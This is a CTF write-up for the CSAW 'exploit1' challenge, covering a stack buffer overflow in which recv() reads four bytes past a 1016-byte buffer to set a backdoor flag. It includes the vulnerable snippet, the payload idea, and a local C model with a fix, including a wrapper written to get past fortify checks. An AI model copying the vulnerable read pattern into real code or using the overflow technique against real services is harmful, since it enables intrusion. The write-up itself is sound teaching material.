For this challenge we are given two files, the exploit1 binary
and exploit1.c (a code snippet from the program). The exploit1.c snippet is as
follows:
[snip]
void handle(int newsock) {
    int backdoor = 0;                 /* lives just past buffer on the stack */
    char buffer[1016];
    FILE *fd;                         /* not declared in the snippet as posted; assumed FILE * */

    memset(buffer, 0, 1016);
    send(newsock, "Welcome to CSAW CTF.", 21, 0);
    recv(newsock, buffer, 1020, 0);   /* reads 4 bytes more than buffer holds */
    buffer[1015] = 0;                 /* terminates buffer, but the overflow has already happened */

    if (backdoor) {                   /* only reachable if the overflow clobbered backdoor */
        fd = fopen("./key", "r");     /* never checked or closed in the original */
        fscanf(fd, "%s\n", buffer);
        send(newsock, buffer, 512, 0);
    }
    close(newsock);
}
[snip]
From the snippet we can clearly tell that the
program allocates 1016 bytes for buffer but reads up to 1020 bytes into it. This can
be confirmed in IDA Pro:
As the screenshot from IDA Pro shows, the code
reads in four more bytes than are allocated for buffer. Those extra bytes overwrite
the values of var_D and var_C, which sit directly past the buffer. The diagram of the stack is
as follows:
To make the program print the key we need to make
the value of var_C (the backdoor flag) non-zero. To do this we simply need to send the
program an input of at least 1020 bytes whose trailing bytes are non-zero (a run of
'A's works); anything beyond 1020 bytes is ignored, since recv() reads at most that many.
The bytes past the buffer land on var_C, the if (backdoor) check passes, and the program
runs the branch that reads ./key and sends it back to us. Send the payload in a single
write so that the server's one recv() call sees all of it.
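To see the overflow mechanics without the challenge server, here is an added example (our own code, not the challenge's). It models the handler's frame as a struct with the int directly after the 1016-byte buffer (the real frame, per the IDA view, has var_D in between), feeds payloads to a copy of the handler over a local socketpair(), and compares the vulnerable 1020-byte recv() against the obvious fix of capping the read at sizeof(buffer) - 1. The struct layout, the recv_raw wrapper and the run_trial harness are assumptions of this model.

```c
/* Added example, not the CSAW challenge code: a local model of the exploit1
 * overflow. socketpair() stands in for the network and struct frame stands in
 * for the handler's stack frame (assumed layout: backdoor right after buffer).
 * Build: cc -O2 -o overflow_model overflow_model.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>

#define BUF_SZ  1016   /* what the handler allocates            */
#define RECV_SZ 1020   /* what the vulnerable recv() asks for   */

/* Model of the stack frame: the int the check reads sits right past buffer. */
struct frame {
    char buffer[BUF_SZ];
    int  backdoor;
};

/* recv() through an opaque pointer so the demo shows the raw overflow instead
 * of being stopped by the libc _FORTIFY_SOURCE wrapper around recv(). */
__attribute__((noinline))
static ssize_t recv_raw(int sock, void *dst, size_t len)
{
    return recv(sock, dst, len, 0);
}

/* Same shape as the challenge handler. recv_len = RECV_SZ reproduces the bug;
 * recv_len = BUF_SZ - 1 is the fix. Returns 1 if the key branch would be taken,
 * 0 if not, -1 on a socket error. */
static int handle(int sock, size_t recv_len)
{
    struct frame f;
    f.backdoor = 0;
    memset(f.buffer, 0, BUF_SZ);
    if (recv_raw(sock, f.buffer, recv_len) < 0)   /* recv_len > BUF_SZ overflows */
        return -1;
    f.buffer[BUF_SZ - 1] = 0;                     /* too late to help */
    return f.backdoor != 0;
}

/* Deliver payload_len copies of `fill` to handle() and report its verdict. */
static int run_trial(size_t recv_len, size_t payload_len, unsigned char fill)
{
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0)
        return -1;

    unsigned char *payload = malloc(payload_len);
    if (!payload) { close(sv[0]); close(sv[1]); return -1; }
    memset(payload, fill, payload_len);

    /* One send, one recv: a 1020-byte payload sits far below the socket buffer,
     * so the handler's single recv() sees all of it (over TCP, still send it in
     * one write for the same reason). */
    ssize_t sent = send(sv[0], payload, payload_len, 0);
    free(payload);
    if (sent != (ssize_t)payload_len) { close(sv[0]); close(sv[1]); return -1; }

    int hit = handle(sv[1], recv_len);
    close(sv[0]);
    close(sv[1]);
    return hit;
}

int main(void)
{
    printf("1016 x 'A' into recv(1020):     backdoor set = %d\n", run_trial(RECV_SZ, 1016, 'A'));
    printf("1020 x 'A' into recv(1020):     backdoor set = %d\n", run_trial(RECV_SZ, 1020, 'A'));
    printf("1020 x 0x00 into recv(1020):    backdoor set = %d\n", run_trial(RECV_SZ, 1020, 0));
    printf("1020 x 'A' into recv(1015) fix: backdoor set = %d\n", run_trial(BUF_SZ - 1, 1020, 'A'));
    return 0;
}
```

Only the 1020-byte run of non-zero bytes against the vulnerable read length flips the flag: a payload that fits the buffer leaves it alone, a payload of zero bytes overwrites it with zero, and the capped read never touches it. Because any non-zero byte that reaches backdoor satisfies the check, a payload a few bytes shorter than 1020 also works in this model; the exact minimum depends on the real frame layout, while 1020 covers it either way.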
We've lost the key since yesterday; will edit if we find it.